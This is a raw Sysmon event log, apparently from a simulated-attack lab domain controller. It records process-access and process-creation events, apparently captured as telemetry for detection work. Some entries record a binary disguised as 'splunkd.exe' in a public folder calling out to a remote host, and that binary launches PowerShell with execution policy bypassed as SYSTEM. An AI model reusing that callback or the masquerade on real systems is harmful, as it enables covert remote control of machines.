08:41:22.574{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B2-5F84-3600-000000007F01}3600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001521Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.553{5D479F2C-16A6-5F84-2400-000000007F01}29482968C:\Windows\system32\conhost.exe{5D479F2C-16B2-5F84-3600-000000007F01}3600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001520Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.552{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001519Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.552{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001518Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.552{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001517Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.552{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001516Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.552{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001515Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.552{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001514Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.552{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001513Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.552{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001512Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.552{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001511Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.551{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3600-000000007F01}3600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001510Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.551{5D479F2C-16A6-5F84-2300-000000007F01}29403000C:\Users\Public\splunkd.exe{5D479F2C-16B2-5F84-3600-000000007F01}3600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Users\Public\splunkd.exe+5c36e 154100x80000000000000001509Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.551{5D479F2C-16B2-5F84-3600-000000007F01}3600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C dncdvdC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-16A6-5F84-2300-000000007F01}2940C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 10341000x80000000000000001508Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.480{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001507Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.480{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001506Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001505Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001504Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001503Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001502Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001501Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001500Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001499Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.386{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001498Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.386{5D479F2C-169F-5F84-0A00-000000007F01}8562660C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001497Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.905{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001496Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001495Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 